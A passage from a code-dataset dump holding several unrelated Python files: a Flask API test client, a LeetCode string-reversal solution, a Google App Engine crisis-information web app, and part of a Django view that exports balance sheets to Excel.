0.85)\r\n\r\npencere.mainloop()\r\n","sub_path":"kelime_anlamini_bulma_oyunu_win.py","file_name":"kelime_anlamini_bulma_oyunu_win.py","file_ext":"py","file_size_in_byte":29655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"556254567","text":"import requests\nimport json\n\n\ndef add():\n url = 'http://127.0.0.1:5000/add'\n data = {\n \"value_array\": [\n {\"value\": 12},\n {\"value\": 18},\n {\"value\": 10}\n ]\n }\n headers = {\n 'Content-Type': 'application/json',\n }\n response = requests.post(url, data=json.dumps(data), headers=headers)\n print(response.json())\n\n\ndef get_date():\n url = 'http://127.0.0.1:5000/get_date'\n response = requests.get(url)\n print(response.json())\n\n\ndef chat(msg):\n url = 'http://127.0.0.1:5000/chat'\n data = {\n \"msg\": msg\n }\n response = requests.post(url, data=data)\n print(response.json())\n\n\nif __name__ == '__main__':\n add()\n get_date()\n chat('您好吗,再见了')","sub_path":"flask_restful/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"567158160","text":"\"\"\"\nGiven a string, you need to reverse the order of characters in each word within a\nsentence while still preserving whitespace and initial word order.\n\"\"\"\n\nclass Solution(object):\n def reverseWords(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n word = \"\"\n sentence = \"\"\n for c in s:\n if c != \" \":\n word = c + word\n else:\n sentence += word + \" \"\n word = \"\"\n\n sentence += word\n return sentence\n\n # This is very fast\n def reverseWords2(self, s):\n return \" \".join(i[::-1] for i in s.split())\n\ns = \"Let's take LeetCode contest\"\nprint(Solution().reverseWords(s))","sub_path":"557RevWord3.py","file_name":"557RevWord3.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"371795210","text":"import cgi\nimport os\nimport StringIO\nimport urllib\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext import db\nfrom collections import defaultdict\n\nfrom IO import *\nimport models\nfrom related import *\nfrom search import 
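# --- Illustrative note, not part of the original: the two reverseWords solutions
# above are not equivalent on runs of whitespace. str.split() with no argument
# collapses consecutive spaces, so only the character-by-character version meets
# the "preserving whitespace" requirement in the problem statement:
#   reverseWords("a  b")  -> "a  b"   (both spaces kept)
#   reverseWords2("a  b") -> "a b"    (collapsed by split/join)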
*\n\n\n\nclass Code(db.Model):\n \"\"\"\n Code wrapper\n Blob is a TextProperty\n \"\"\"\n blob = db.TextProperty()\n\n\n\nclass MainPage(webapp.RequestHandler):\n\n def get(self):\n \"\"\"\n Called to handle an HTTP GET request.\n Displays home page\n \"\"\"\n\n template_values = {}\n path = os.path.join(os.path.dirname(__file__), 'html/index.html')\n general_values = { 'content' : template.render(path, template_values) }\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n \n \nclass IO(webapp.RequestHandler):\n \"\"\"\n webapp.RequestHandler is a module used currently only so we can enable an import/export on the main page\n This class is the main page of our site\n \"\"\"\n\n status = \"\"\n def get(self): \n \"\"\"\n Called to handle an HTTP GET request.\n Displays home page\n \"\"\"\n template_values = { 's': IO.status }\n path = os.path.join(os.path.dirname(__file__), 'html/io.html')\n general_values = { 'content' : template.render(path, template_values) }\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n\n def post(self):\n \"\"\"\n Called to handle an HTTP POST request.\n Calls fill_db with the input file as a parameter in order to import data.\n \"\"\"\n f = cgi.escape(self.request.get('filename'))\n obj = Code()\n \n #try:\n obj.blob=db.Text(f, encoding = \"utf_8\")\n fill_db(obj.blob)\n IO.status = \"Success!\" \n self.redirect('/io')\n #except:\n # IO.status = \"Invalid File.\" \n # self.redirect('/io')\n\n\n\nclass Crises_Index(webapp.RequestHandler):\n \"\"\"\n Crisis_Index is a RequestHandler class.\n This class handles the page that lists all of the crises currently in our database.\n \"\"\"\n def get(self):\n \"\"\"\n Called to handle an HTTP GET request.\n Gets all of the crises in our database by performing a Query. \n Sends the result to \"crisis_index\", whose result is then used to render the page displayed using \"general.html\" \n \"\"\"\n \n crises = db.GqlQuery(\"SELECT * FROM Crisis ORDER BY category\")\n d = defaultdict(list)\n \n for crisis in crises:\n d[crisis.category].append(crisis)\n sorted_crises = sort_dict(d)\n \n template_values = {'sorted_list':sorted_crises, 'type': 'crises'}\n path = os.path.join(os.path.dirname(__file__), 'html/intermediate.html') \n general_values = { 'content' : template.render(path, template_values) }\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n \nclass Orgs_Index(webapp.RequestHandler):\n \"\"\"\n Orgs_Index is a RequestHandler class.\n This class handles the page that lists all of the organizations currently in our database.\n \"\"\"\n def get(self):\n \"\"\"\n Called to handle an HTTP GET request.\n Gets all of the organizations in our database by performing a Query. 
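# --- Illustrative sketch, not part of the original: the three *_Index handlers in
# this file share one pattern -- bucket entities under a key with defaultdict(list),
# then sort the buckets by key via the sort_dict() helper defined near the bottom.
# The whole pattern fits in one reusable function:
from collections import defaultdict

def group_and_sort(items, key_fn):
    buckets = defaultdict(list)
    for item in items:
        buckets[key_fn(item)].append(item)
    return sorted(buckets.items())  # [(key, [items...]), ...] ordered by key

# e.g. group_and_sort(crises, lambda c: c.category) for Crises_Index, or
#      group_and_sort(people, lambda p: p.name.split()[-1][0]) for People_Index.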
\n Sends the result to \"orgs_index\", whose result is then used to render the page displayed using \"general.html\" \n \"\"\"\n orgs = db.GqlQuery(\"SELECT * FROM Organization ORDER BY name\")\n \n d = defaultdict(list)\n \n for org in orgs:\n d[org.name[0]].append(org)\n \n sorted_orgs = sort_dict(d)\n template_values = {'sorted_list':sorted_orgs, 'type': 'organizations'}\n \n path = os.path.join(os.path.dirname(__file__), 'html/intermediate.html')\n general_values = { 'content' : template.render(path, template_values) }\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n \nclass People_Index(webapp.RequestHandler):\n \"\"\"\n People_Index is a RequestHandler class.\n This class handles the page that lists all of the people currently in our database.\n \"\"\"\n def get(self):\n \"\"\"\n Called to handle an HTTP GET request.\n Gets all of the people in our database by performing a Query. \n Sends the result to \"people_index\", whose result is then used to render the page displayed using \"general.html\" \n \"\"\"\n people = db.GqlQuery(\"SELECT * FROM Person ORDER BY name\")\n d = defaultdict(list)\n \n for person in people:\n d[person.name.split()[-1][0]].append(person)\n \n sorted_people = sort_dict(d)\n template_values = { 'sorted_list': sorted_people, 'type':'people' }\n path = os.path.join(os.path.dirname(__file__), 'html/intermediate.html')\n general_values = { 'content' : template.render(path, template_values) }\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n \n \nclass Person_Page(webapp.RequestHandler): \n \"\"\"\n Person_Page is a RequestHandler class.\n This class handles the page that lists the infromation corresponding to a particular person. \n \"\"\"\n def get(self, name):\n \"\"\"\n Called to handle an HTTP GET request.\n Gets all information required by the person page template \"person.html\" from the datastore.\n Gets all related information required by the related template \"related.html\" by calling getRelatedFromPerson.\n Renders those two pages and renders the result using the general template \"general.html\".\n name is the formatted name of the Person whose information is to be displayed. 
\n \n \"\"\"\n s = urllib.unquote(name)\n s = s.replace('+', ' ')\n person = models.Person.get_by_key_name(s)\n path = os.path.join(os.path.dirname(__file__), 'html/person.html')\n template_values = {\"name\" : person.name,\n \"category\" : person.category,\n \"location\" : person.location, \n \"description\" : person.description, \n \"images\" : [models.Link.get(key) for key in person.images] }\n \n \n \n links_path = os.path.join(os.path.dirname(__file__), 'html/links.html') \n links_values = { \"videos\" : [models.Link.get(key) for key in person.videos],\n \"links\" : [models.Link.get(key) for key in person.links],\n \"social_networks\" : [models.Link.get(key) for key in person.social_networks] }\n \n related_path = os.path.join(os.path.dirname(__file__), 'html/related.html')\n general_values = { 'related' : template.render(related_path, getRelatedFromPerson(person) ), \n 'content' : template.render(path, template_values),\n 'links' : template.render(links_path, links_values) }\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n \n \nclass Org_Page(webapp.RequestHandler): \n \"\"\"\n Org_Page is a RequestHandler class.\n This class handles the page that lists the infromation corresponding to a particular organization. \n \"\"\"\n def get(self, name):\n \"\"\"\n Called to handle an HTTP GET request.\n Gets all information required by the organizaton page template \"org.html\" from the datastore.\n Gets all related information required by the related template \"related.html\" by calling getRelatedFromOrganization.\n Renders those two pages and renders the result using the general template \"general.html\".\n name is the formatted name of the organization whose information is to be displayed. \n \n \"\"\"\n s = urllib.unquote(name)\n s = s.replace('+', ' ')\n organization = models.Organization.get_by_key_name(s)\n path = os.path.join(os.path.dirname(__file__), 'html/org.html')\n template_values = {\"name\" : organization.name,\n \"category\" : organization.category,\n \"location\" : organization.location,\n \"phone\" : organization.phone_number,\n \"history\" : organization.history,\n \"resources_needed\" : organization.resources_needed,\n \"images\" : [models.Link.get(key) for key in organization.images]}\n \n \n links_path = os.path.join(os.path.dirname(__file__), 'html/links.html') \n links_values = { \"videos\" : [models.Link.get(key) for key in organization.videos],\n \"links\" : [models.Link.get(key) for key in organization.links],\n \"social_networks\" : [models.Link.get(key) for key in organization.social_networks] }\n \n related_path = os.path.join(os.path.dirname(__file__), 'html/related.html')\n general_values = { 'related' : template.render(related_path, getRelatedFromOrganization(organization)),\n 'content' : template.render(path, template_values),\n 'links' : template.render(links_path, links_values) }\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n \nclass Crisis_Page(webapp.RequestHandler): \n \"\"\"\n Crisis_Page is a RequestHandler class.\n This class handles the page that lists the infromation corresponding to a particular Crisis. 
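# --- Illustrative sketch, not part of the original: Person_Page, Org_Page and
# Crisis_Page each repeat the same two-step decoding of the name taken from the
# URL before the get_by_key_name() lookup; a small helper would remove the copies.
import urllib

def decode_key_name(raw):
    """Undo the '+'-for-space URL encoding used by this app's entity links."""
    return urllib.unquote(raw).replace('+', ' ')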
\n \"\"\"\n def get(self, name):\n \"\"\"\n Called to handle an HTTP GET request.\n Gets all information required by the crisis page template \"crisis.html\" from the datastore.\n Gets all related information required by the related template \"related.html\" by calling getRelatedFromCrisis.\n Renders those two pages and renders the result using the general template \"general.html\".\n name is the formatted name of the crisis whose information is to be displayed. \n \n \"\"\"\n s = urllib.unquote(name)\n s = s.replace('+', ' ')\n crisis = models.Crisis.get_by_key_name(s)\n path = os.path.join(os.path.dirname(__file__), 'html/crisis.html')\n template_values = { \"description\": crisis.description, \n \"name\" : crisis.name, \n \"location\" : crisis.location,\n \"date\" : crisis.date, \n \"human_impact\" : crisis.human_impact, \n \"economic_impact\" : crisis.economic_impact,\n \"category\" : crisis.category, \n \"resources_needed\" : crisis.resources_needed, \n \"ways_to_help\" : crisis.ways_to_help,\n \"images\" : [models.Link.get(key) for key in crisis.images] }\n\n related_path = os.path.join(os.path.dirname(__file__), 'html/related.html')\n \n links_path = os.path.join(os.path.dirname(__file__), 'html/links.html') \n links_values = { \"videos\" : [models.Link.get(key) for key in crisis.videos],\n \"links\" : [models.Link.get(key) for key in crisis.links],\n \"social_networks\" : [models.Link.get(key) for key in crisis.social_networks] }\n \n general_values = { 'related' : template.render(related_path, getRelatedFromCrisis(crisis)),\n 'content' : template.render(path, template_values),\n 'links' : template.render(links_path, links_values) }\n\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n \nclass Search_Page(webapp.RequestHandler):\n \"\"\"\n Search_Page is a RequestHandler class.\n This class handles the page that handles the search feature. \n \"\"\"\n \n def get(self):\n table_path = os.path.join(os.path.dirname(__file__), 'html/table.html')\n general_values = { 'content' : template.render(table_path, {\"search_term\": cgi.escape(self.request.get('search_term')), \n \"results\": [] } )} \n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n\n def post(self):\n table_path = os.path.join(os.path.dirname(__file__), 'html/table.html')\n general_values = { 'content' : template.render(table_path, {\"search_term\": cgi.escape(self.request.get('search_term')), \n \"results\": get_results(self.request.get('search_term'))} )} \n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n\nclass XML(webapp.RequestHandler):\n \"\"\"\n XML is a RequestHandler class.\n This class handles the page that displays the information in our database as XML. It is used when we export our data.. 
\n \"\"\"\n def get(self):\n w = StringIO.StringIO()\n create_XML(w)\n self.response.headers['Content-Type']='text/xml; charset=utf_8'\n self.response.out.write( w.getvalue() )\n w.close()\n\n\napplication = webapp.WSGIApplication(\n [('/', MainPage),\n ('/io', IO),\n ('/export.xml', XML),\n ('/crises/(.+)', Crisis_Page),\n ('/organizations/(.+)', Org_Page),\n ('/people/(.+)', Person_Page),\n ('/crises/', Crises_Index),\n ('/organizations/', Orgs_Index),\n ('/people/', People_Index),\n ('/search', Search_Page)], \n debug=True)\n\n \n \ndef sort_dict(d):\n \"\"\"\n takes a dictionary, and sorts it into a list of key,value tuples sorted by key)\n dictionary is a dictionary we plan to sort\n return sorted_dict, a list of tuples sorted by the first value in the tuple (the key gathered from the dictionary)\n \"\"\"\n sorted_dict = []\n for key,value in d.items():\n sorted_dict.append((key, value))\n return sorted(sorted_dict)\n\n \n\ndef main():\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main() \n","sub_path":"wc1.py","file_name":"wc1.py","file_ext":"py","file_size_in_byte":15391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"553978518","text":"#coding=utf-8\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, render_to_response\nfrom django.template import RequestContext\nfrom LoginRegister.models import usertable\nfrom UserManage.models import commenttable, balancesheet, cashflow, incomestatement\nimport re\nimport time\nimport datetime\nimport os\nfrom xlwt import*\nimport xlwt\n\nformbalancesheet = [\"流动资产:\", \"流动负债:\", \"货币资金\", \"短期借款\",\\\n \"交易性金融资产\", \"交易性金融负债\", \"应收票据\", \"应付票据\", \"应收账款\",\\\n \"应付账款\", \"预付款项\", \"预收款项\", \"应收利息\", \"应付职工薪酬\", \"应收股利\",\\\n \"应交税费\" , \"其他应收款\", \"应付利息\", \"存货\", \"应付股利\", \"一年内到期的非流动资产\",\\\n \"其他应付款\", \"其他流动资产\", \"一年内到期的非流动负债\", \"\", \"其他流动负债\",\\\n \"流动资产合计\", \"流动负债合计\", \"非流动资产:\", \"非流动负债:\", \"可供出售金融资产\",\\\n \"长期借款\", \"持有至到期投资\", \"应付债券\", \"长期应收款\", \"长期应付款\", \"长期股权投资\",\\\n \"专项应付款\", \"投资性房地产\", \"预计负债\", \"固定资产\", \"递延所得税负债\",\\\n \"减:累计折旧\", \"其他非流动负债\", \"固定资产净值\", \"非流动负债合计\",\"减:固定资产减值准备\",\\\n \"负债合计\", \"固定资产净额\", \"\", \"在建工程\", \"所有者权益(或股东权益):\", \"工程物资\",\\\n \"实收资本(或股本)\", \"固定资产清理\", \"资本公积\", \"生产性生物资产\", \"减:库存股\",\\\n \"无形资产\", \"专项储备\", \"无形资产\", \"盈余公积\", \"商誉\", \"未分配利润\", \"长期待摊费用\",\\\n \"所有者权益(或股东权益)合计\", \"递延所得税资产\", \"\", \"其他非流动资产\", \"\",\\\n \"非流动资产合计\", \"\", \"资产总计\", \"负债和所有者权益(或股东权益)合计\"]\n \ndef exportbalancesheetexcel(request, userid, sheetid):\n username = usertable.objects.get(userid=userid).username\n results = balancesheet.objects.filter(user=userid)\n return render(request, \"ListBalanceSheet.html\", { \"username\":username, \\\n \"userid\":userid, \"sheets\":results, \"sheetid\":int(sheetid) })\n\ndef exportbalancesheettopath(request):\n userid = request.POST.get(\"userid\", '')\n sheetid = request.POST.get(\"sheetid\", '')\n path = request.POST.get(\"path\", '')\n balasheet = balancesheet.objects.get(id=sheetid)\n\n\n if os.path.exists(path):\n return HttpResponse(path+\" exists.\")\n else:\n pattern = re.compile(r'.+\\.xls$')\n if not pattern.search(path):\n return HttpResponse(\"Please input the file ended with '.xls'.\")\n else:\n workbook = Workbook(encoding='utf-8') #改变编码用于显示中文\n \n al = xlwt.Alignment()\n al.horz = Alignment.HORZ_CENTER\n \n fnt = Font()\n fnt.bold = True\n fnt.height = 250\n \n fnt2 = Font()\n fnt2.bold = True\n fnt2.height = 350\n \n fnt3 = 
Font()\n fnt3.bold = True\n \n style = XFStyle()\n style.alignment = al\n style.font = fnt\n \n style2 = XFStyle()\n style2.alignment = al\n style2.font = fnt2\n \n style3 = XFStyle()\n style3.font = fnt3\n \n style4 = XFStyle()\n style4.alignment = al\n \n sheet = workbook.add_sheet(\"sheet1\")\n sheet.panes_frozen=True\n sheet.horz_split_pos=3 #行冻结\n sheet.write_merge(0,0,0,5,'资产负债表', style2)\n #sheet.row(2).set_style(style)\n sheet.write(2,0,'资产', style)\n sheet.write(2,1,'年初余额', style)\n sheet.write(2,2,'期末余额', style)\n sheet.write(2,3,'负债和所有者权益(或股东权益)', style)\n sheet.write(2,4,'年初余额', style)\n sheet.write(2,5,'期末余额', style)\n # print len(column)\n sheet.write(1,0,'编制单位:', style)\n sheet.write_merge(1,1,1,2,balasheet.unit, style)\n sheet.write(1,3,'时间:', style)\n time1 = str(balasheet.date)\n sheet.write_merge(1,1,4,5,time1, style)\n \n for i in range(0,len(formbalancesheet)/2):\n if(i in [13,22,24,35,36]):\n sheet.write(3+i,0,formbalancesheet[2*i], style3)\n else:\n sheet.write(3+i,0,formbalancesheet[2*i])\n \n if(i in [13,22,23,32,36]):\n sheet.write(3+i,3,formbalancesheet[2*i+1], style3)\n else:\n sheet.write(3+i,3,formbalancesheet[2*i+1])\n\n if(balasheet.a5):\n sheet.write(4,1,balasheet.a5, style4)\n if(balasheet.a6):\n sheet.write(4,2,balasheet.a6, style4)\n if(balasheet.a7):\n sheet.write(4,4,balasheet.a7, style4)\n if(balasheet.a8):\n sheet.write(4,5,balasheet.a8, style4)\n if(balasheet.a9):\n sheet.write(5,1,balasheet.a9, style4)\n if(balasheet.a10):\n sheet.write(5,2,balasheet.a10, style4)\n if(balasheet.a11):\n sheet.write(5,4,balasheet.a11, style4)\n if(balasheet.a12):\n sheet.write(5,5,balasheet.a12, style4)\n if(balasheet.a13):\n sheet.write(6,1,balasheet.a13, style4)\n if(balasheet.a14):\n sheet.write(6,2,balasheet.a14, style4)\n if(balasheet.a15):\n sheet.write(6,4,balasheet.a15, style4)\n if(balasheet.a16):\n sheet.write(6,5,balasheet.a16, style4)\n if(balasheet.a17):\n sheet.write(7,1,balasheet.a17, style4)\n if(balasheet.a18):\n sheet.write(7,2,balasheet.a18, style4)\n if(balasheet.a19):\n sheet.write(7,4,balasheet.a19, style4)\n if(balasheet.a20):\n sheet.write(7,5,balasheet.a20, style4)\n if(balasheet.a21):\n sheet.write(8,1,balasheet.a21, style4)\n if(balasheet.a22):\n sheet.write(8,2,balasheet.a22, style4)\n if(balasheet.a23):\n sheet.write(8,4,balasheet.a23, style4)\n if(balasheet.a24):\n sheet.write(8,5,balasheet.a24, style4)\n if(balasheet.a25):\n sheet.write(9,1,balasheet.a25, style4)\n if(balasheet.a26):\n sheet.write(9,2,balasheet.a26, style4)\n if(balasheet.a27):\n sheet.write(9,4,balasheet.a27, style4)\n if(balasheet.a28):\n sheet.write(9,5,balasheet.a28, style4)\n if(balasheet.a29):\n sheet.write(10,1,balasheet.a29, style4)\n if(balasheet.a30):\n sheet.write(10,2,balasheet.a30, style4)\n if(balasheet.a31):\n sheet.write(10,4,balasheet.a31, style4)\n if(balasheet.a32):\n sheet.write(10,5,balasheet.a32, style4)\n if(balasheet.a33):\n sheet.write(11,1,balasheet.a33, style4)\n if(balasheet.a34):\n sheet.write(11,2,balasheet.a34, style4)\n if(balasheet.a35):\n sheet.write(11,4,balasheet.a35, style4)\n if(balasheet.a36):\n sheet.write(11,5,balasheet.a36, style4)\n if(balasheet.a37):\n sheet.write(12,1,balasheet.a37, style4)\n if(balasheet.a38):\n sheet.write(12,2,balasheet.a38, style4)\n if(balasheet.a39):\n sheet.write(12,4,balasheet.a39, style4)\n if(balasheet.a40):\n sheet.write(12,5,balasheet.a40, style4)\n if(balasheet.a41):\n sheet.write(13,1,balasheet.a41, style4)\n if(balasheet.a42):\n sheet.write(13,2,balasheet.a42, style4)\n if(balasheet.a43):\n 
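# --- Illustrative sketch, not part of the original: the XFStyle/Font/Alignment
# objects assembled by hand above can also be produced with xlwt.easyxf, which
# builds equivalent styles (bold fonts, larger heights, centered text) from a
# one-line spec string:
import xlwt

style_center_bold = xlwt.easyxf('font: bold on, height 250; align: horiz center')
style_title = xlwt.easyxf('font: bold on, height 350; align: horiz center')
style_center = xlwt.easyxf('align: horiz center')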
sheet.write(13,4,balasheet.a43, style4)\n if(balasheet.a44):\n sheet.write(13,5,balasheet.a44, style4)\n if(balasheet.a45):\n sheet.write(14,1,balasheet.a45, style4)\n if(balasheet.a46):\n sheet.write(14,2,balasheet.a46, style4)\n if(balasheet.a47):\n sheet.write(14,4,balasheet.a47, style4)\n if(balasheet.a48):\n sheet.write(14,5,balasheet.a48, style4)\n if(balasheet.a49):\n sheet.write(15,4,balasheet.a49, style4)\n if(balasheet.a50):\n sheet.write(15,5,balasheet.a50, style4)\n sheet.write(16,1,balasheet.SUMB1, style4)\n sheet.write(16,2,balasheet.SUMC1, style4)\n sheet.write(16,4,balasheet.SUME1, style4)\n sheet.write(16,5,balasheet.SUMF1, style4)\n if(balasheet.a55):\n sheet.write(18,1,balasheet.a55, style4)\n if(balasheet.a56):\n sheet.write(18,2,balasheet.a56, style4)\n if(balasheet.a57):\n sheet.write(18,4,balasheet.a57, style4)\n if(balasheet.a58):\n sheet.write(18,5,balasheet.a58, style4)\n if(balasheet.a59):\n sheet.write(19,1,balasheet.a59, style4)\n if(balasheet.a60):\n sheet.write(19,2,balasheet.a60, style4)\n if(balasheet.a61):\n sheet.write(19,4,balasheet.a61, style4)\n if(balasheet.a62):\n sheet.write(19,5,balasheet.a62, style4)\n if(balasheet.a63):\n sheet.write(20,1,balasheet.a63, style4)\n if(balasheet.a64):\n sheet.write(20,2,balasheet.a64, style4)\n if(balasheet.a65):\n sheet.write(20,4,balasheet.a65, style4)\n if(balasheet.a66):\n sheet.write(20,5,balasheet.a66, style4)\n if(balasheet.a67):\n sheet.write(21,1,balasheet.a67, style4)\n if(balasheet.a68):\n sheet.write(21,2,balasheet.a68, style4)\n if(balasheet.a69):\n sheet.write(21,4,balasheet.a69, style4)\n if(balasheet.a70):\n sheet.write(21,5,balasheet.a70, style4)\n if(balasheet.a71):\n sheet.write(22,1,balasheet.a71, style4)\n if(balasheet.a72):\n sheet.write(22,2,balasheet.a72, style4)\n if(balasheet.a73):\n sheet.write(22,4,balasheet.a73, style4)\n if(balasheet.a74):\n sheet.write(22,5,balasheet.a74, style4)\n if(balasheet.a75):\n sheet.write(23,1,balasheet.a75, style4)\n if(balasheet.a76):\n sheet.write(23,2,balasheet.a76, style4)\n if(balasheet.a77):\n sheet.write(23,4,balasheet.a77, style4)\n if(balasheet.a78):\n sheet.write(23,5,balasheet.a78, style4)\n if(balasheet.a79):\n sheet.write(24,1,balasheet.a79, style4)\n if(balasheet.a80):\n sheet.write(24,2,balasheet.a80, style4)\n if(balasheet.a81):\n sheet.write(24,4,balasheet.a81, style4)\n if(balasheet.a82):\n sheet.write(24,5,balasheet.a82, style4)\n \n sheet.write(25,1,balasheet.SUBB1, style4)\n sheet.write(25,2,balasheet.SUBC1, style4)\n sheet.write(25,4,balasheet.SUME2, style4)\n sheet.write(25,5,balasheet.SUMF2, style4)\n if(balasheet.a83):\n sheet.write(26,1,balasheet.a83, style4)\n if(balasheet.a84):\n sheet.write(26,2,balasheet.a84, style4)\n sheet.write(26,4,balasheet.SUME3, style4)\n sheet.write(26,5,balasheet.SUMF3, style4)\n \n \n sheet.write(27,1,balasheet.SUBB2, style4)\n sheet.write(27,2,balasheet.SUBC2, style4)\n \n if(balasheet.a85):\n sheet.write(28,1,balasheet.a85, style4)\n if(balasheet.a86):\n sheet.write(28,2,balasheet.a86, style4)\n if(balasheet.a87):\n sheet.write(27+1,4,balasheet.a87, style4)\n if(balasheet.a88):\n sheet.write(27+1,5,balasheet.a88, style4)\n if(balasheet.a89):\n sheet.write(28+1,1,balasheet.a89, style4)\n if(balasheet.a90):\n sheet.write(28+1,2,balasheet.a90, style4)\n if(balasheet.a91):\n sheet.write(28+1,4,balasheet.a91, style4)\n if(balasheet.a92):\n sheet.write(28+1,5,balasheet.a92, style4)\n if(balasheet.a93):\n sheet.write(29+1,1,balasheet.a93, style4)\n if(balasheet.a94):\n sheet.write(29+1,2,balasheet.a94, 
style4)\n if(balasheet.a95):\n sheet.write(29+1,4,balasheet.a95, style4)\n if(balasheet.a96):\n sheet.write(29+1,5,balasheet.a96, style4)\n if(balasheet.a97):\n sheet.write(30+1,1,balasheet.a97, style4)\n if(balasheet.a98):\n sheet.write(30+1,2,balasheet.a98, style4)\n if(balasheet.a99):\n sheet.write(30+1,4,balasheet.a99, style4)\n if(balasheet.a100):\n sheet.write(30+1,5,balasheet.a100, style4)\n if(balasheet.a101):\n sheet.write(31+1,1,balasheet.a101, style4)\n if(balasheet.a102):\n sheet.write(31+1,2,balasheet.a102, style4)\n if(balasheet.a103):\n sheet.write(31+1,4,balasheet.a103, style4)\n if(balasheet.a104):\n sheet.write(31+1,5,balasheet.a104, style4)\n if(balasheet.a105):\n sheet.write(32+1,1,balasheet.a105, style4)\n if(balasheet.a106):\n sheet.write(32+1,2,balasheet.a106, style4)\n if(balasheet.a107):\n sheet.write(32+1,4,balasheet.a107, style4)\n if(balasheet.a108):\n sheet.write(32+1,5,balasheet.a108, style4)\n if(balasheet.a109):\n sheet.write(33+1,1,balasheet.a109, style4)\n if(balasheet.a110):\n sheet.write(33+1,2,balasheet.a110, style4)\n if(balasheet.a111):\n sheet.write(33+1,4,balasheet.a111, style4)\n if(balasheet.a112):\n sheet.write(33+1,5,balasheet.a112, style4)\n if(balasheet.a113):\n sheet.write(34+1,1,balasheet.a113, style4)\n if(balasheet.a114):\n sheet.write(34+1,2,balasheet.a114, style4)\n sheet.write(35,4,balasheet.SUME4, style4)\n sheet.write(35,5,balasheet.SUMF4, style4)\n if(balasheet.a115):\n sheet.write(36,1,balasheet.a115, style4)\n if(balasheet.a116):\n sheet.write(36,2,balasheet.a116, style4)\n if(balasheet.a117):\n sheet.write(37,1,balasheet.a117, style4)\n if(balasheet.a118):\n sheet.write(37,2,balasheet.a118, style4)\n sheet.write(38,1,balasheet.SUMB2, style4)\n sheet.write(38,2,balasheet.SUMC2, style4)\n sheet.write(39,1,balasheet.SUMB3, style4)\n sheet.write(39,2,balasheet.SUMC3, style4)\n sheet.write(39,4,balasheet.SUME5, style4)\n sheet.write(39,5,balasheet.SUMF5, style4)\n \n sheet.col(0).width = 256*36\n sheet.col(1).width = 256*16\n sheet.col(2).width = 256*16\n sheet.col(3).width = 256*40\n sheet.col(4).width = 256*16\n sheet.col(5).width = 256*16\n \n \n workbook.save(path)\n username = usertable.objects.get(userid=userid).username\n results = balancesheet.objects.filter(user=userid)\n return render(request, \"ListBalanceSheet.html\", { \"username\":username, \\\n \"userid\":userid, \"sheets\":results, \"sheetid\":-1, \"isexport\":1 })\n\ndef editbalancesheet(request, userid, sheetid):\n username = usertable.objects.get(userid=userid).username\n sheet = balancesheet.objects.get(id=sheetid)\n return render(request, \"AddBalanceSheet.html\", {\"sheetid\":sheetid, \"isupdate\":1, \"userid\":userid, \\\n \"username\":username, \\\n \"unit\":sheet.unit, \\\n 'v5':sheet.a5, 'v6':sheet.a6, \\\n 'v7':sheet.a7, 'v8':sheet.a8, 'v9':sheet.a9, \\\n 'v10':sheet.a10, 'v11':sheet.a11, 'v12':sheet.a12, \\\n 'v13':sheet.a13, 'v14':sheet.a14, 'v15':sheet.a15, \\\n 'v16':sheet.a16, 'v17':sheet.a17, 'v18':sheet.a18, \\\n 'v19':sheet.a19, 'v20':sheet.a20, 'v21':sheet.a21, \\\n 'v22':sheet.a22, 'v23':sheet.a23, 'v24':sheet.a24, \\\n 'v25':sheet.a25, 'v26':sheet.a26, 'v27':sheet.a27, \\\n 'v28':sheet.a28, 'v29':sheet.a29, 'v30':sheet.a30, \\\n 'v31':sheet.a31, 'v32':sheet.a32, 'v33':sheet.a33, \\\n 'v34':sheet.a34, 'v35':sheet.a35, 'v36':sheet.a36, \\\n 'v37':sheet.a37, 'v38':sheet.a38, 'v39':sheet.a39, \\\n 'v40':sheet.a40, 'v41':sheet.a41, 'v42':sheet.a42, \\\n 'v43':sheet.a43, 'v44':sheet.a44, 'v45':sheet.a45, \\\n 'v46':sheet.a46, 'v47':sheet.a47, 
